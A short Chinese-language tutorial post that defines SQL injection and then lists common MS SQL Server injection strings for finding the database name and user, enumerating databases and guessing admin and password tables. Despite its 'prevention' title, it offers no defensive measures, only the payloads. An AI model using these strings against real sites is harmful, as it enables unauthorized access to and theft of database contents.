基础知识之防止SQL注入

1）什么是SQL注入

所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将（恶意）的SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。

2）一些常见的SQL注入语句

1、返回的是连接的数据库名
 and db_name()>0
2、作用是获取连接用户名
 and user>0
3、猜解所有数据库名称
and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0   dbid=6,7,8分别得到其它库名
4、猜解数据库中用户名表的名称
先猜表名
And (Select count(*) from 表名)<>0
猜列名
And (Select count（列名） from 表名）<>0
或者也可以这样
and exists (select * from 表名）
and exists (select 列名 from 表名）
5、查看数据库角色
;use model--

6判断有无注入点
; and 1=1 and 1=2

7.猜表一般的表的名称无非是admin adminuser user pass password 等..

and 0<>(select count(*) from *)

and 0<>(select count(*) from admin) ---判断是否存在admin这张表

由于SQL语句比较多 欢迎大家去查看百度百科的sql注入或百度文档的SQL注入，在此我就不一一举例了！